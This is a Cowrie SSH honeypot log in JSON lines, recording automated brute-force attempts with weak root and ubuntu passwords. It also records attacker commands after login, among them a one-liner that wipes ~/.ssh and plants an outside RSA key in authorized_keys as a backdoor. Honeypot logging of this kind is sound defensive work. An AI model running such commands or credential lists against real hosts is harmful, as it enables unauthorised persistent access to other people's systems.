{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T22:50:18.916023Z","src_ip":"45.78.197.1","session":"21469d54f2db"}
{"eventid":"cowrie.session.closed","duration":"36.3","message":"Connection lost after 36.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:50:18.917805Z","src_ip":"45.78.197.1","session":"21469d54f2db"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":33438,"dst_ip":"1.2.3.4","dst_port":22,"session":"34ff134bb2ba","protocol":"ssh","message":"New connection: 196.251.115.108:33438 (1.2.3.4:22) [session: 34ff134bb2ba]","sensor":"my-vps","timestamp":"2025-08-24T22:50:56.151771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:50:56.500054Z","src_ip":"196.251.115.108","session":"34ff134bb2ba"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:50:56.500733Z","src_ip":"196.251.115.108","session":"34ff134bb2ba"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345678","message":"login attempt [ubuntu/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T22:51:00.185148Z","src_ip":"196.251.115.108","session":"34ff134bb2ba"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:51:01.320473Z","src_ip":"196.251.115.108","session":"34ff134bb2ba"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":49830,"dst_ip":"1.2.3.4","dst_port":22,"session":"3020f00b63e1","protocol":"ssh","message":"New connection: 196.251.115.108:49830 (1.2.3.4:22) [session: 3020f00b63e1]","sensor":"my-vps","timestamp":"2025-08-24T22:51:43.697674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:51:44.212838Z","src_ip":"196.251.115.108","session":"3020f00b63e1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:51:44.213632Z","src_ip":"196.251.115.108","session":"3020f00b63e1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qwerty","message":"login attempt [ubuntu/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T22:51:46.607090Z","src_ip":"196.251.115.108","session":"3020f00b63e1"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:51:47.788520Z","src_ip":"196.251.115.108","session":"3020f00b63e1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":49870,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4c0818d3aee","protocol":"ssh","message":"New connection: 196.251.115.108:49870 (1.2.3.4:22) [session: a4c0818d3aee]","sensor":"my-vps","timestamp":"2025-08-24T22:52:30.859239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:52:31.557271Z","src_ip":"196.251.115.108","session":"a4c0818d3aee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:52:31.557971Z","src_ip":"196.251.115.108","session":"a4c0818d3aee"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123123","message":"login attempt [ubuntu/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T22:52:34.415510Z","src_ip":"196.251.115.108","session":"a4c0818d3aee"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:35.548743Z","src_ip":"196.251.115.108","session":"a4c0818d3aee"}
{"eventid":"cowrie.session.connect","src_ip":"103.174.115.196","src_port":60844,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d7319b82c5a","protocol":"ssh","message":"New connection: 103.174.115.196:60844 (1.2.3.4:22) [session: 9d7319b82c5a]","sensor":"my-vps","timestamp":"2025-08-24T22:52:47.111292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T22:52:47.112235Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T22:52:47.292840Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Fy123456","message":"login attempt [root/Fy123456] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.057995Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:52:48.482361Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.483314Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.484685Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.666902Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.118.153","src_port":58614,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bd53459ab26","protocol":"ssh","message":"New connection: 14.103.118.153:58614 (1.2.3.4:22) [session: 3bd53459ab26]","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.727493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.729194Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T22:52:48.905230Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:52:49.049256Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.049981Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.236176Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.237260Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.session.connect","src_ip":"103.174.115.196","src_port":60858,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e47023ce286","protocol":"ssh","message":"New connection: 103.174.115.196:60858 (1.2.3.4:22) [session: 0e47023ce286]","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.421587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.428814Z","src_ip":"103.174.115.196","session":"0e47023ce286"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.613697Z","src_ip":"103.174.115.196","session":"0e47023ce286"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123+","message":"login attempt [root/Admin123+] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:52:49.625379Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:52:50.032219Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T22:52:50.032951Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T22:52:50.034095Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:50.217670Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T22:52:50.406021Z","src_ip":"103.174.115.196","session":"0e47023ce286"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:52:50.634901Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T22:52:50.635693Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:51.595666Z","src_ip":"103.174.115.196","session":"0e47023ce286"}
{"eventid":"cowrie.session.connect","src_ip":"103.174.115.196","src_port":48890,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ecc5870156","protocol":"ssh","message":"New connection: 103.174.115.196:48890 (1.2.3.4:22) [session: 98ecc5870156]","sensor":"my-vps","timestamp":"2025-08-24T22:52:51.781339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T22:52:51.782116Z","src_ip":"103.174.115.196","session":"98ecc5870156"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T22:52:51.965468Z","src_ip":"103.174.115.196","session":"98ecc5870156"}
